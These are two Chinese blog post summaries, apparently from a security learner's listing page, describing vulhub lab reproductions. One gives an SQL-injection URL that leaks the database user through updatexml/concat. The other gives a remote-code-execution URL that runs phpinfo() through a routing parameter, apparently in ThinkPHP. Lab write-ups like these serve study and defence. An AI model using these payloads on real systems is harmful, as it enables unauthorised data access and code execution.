摘要：1.访问url 2.访问漏洞url 3.访问http://192.168.232.128/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 4.数据库信息泄露 阅读全文

摘要：1.vulhub下载在kali里面 2.访问到这个路径 3.docker-compose up -d 启动环境之后访问ip:8080 4显示页面 5.RCE命令执行 http://your-ip:8080/index.php?s=/index/index/name/${@phpinfo()} 阅读全文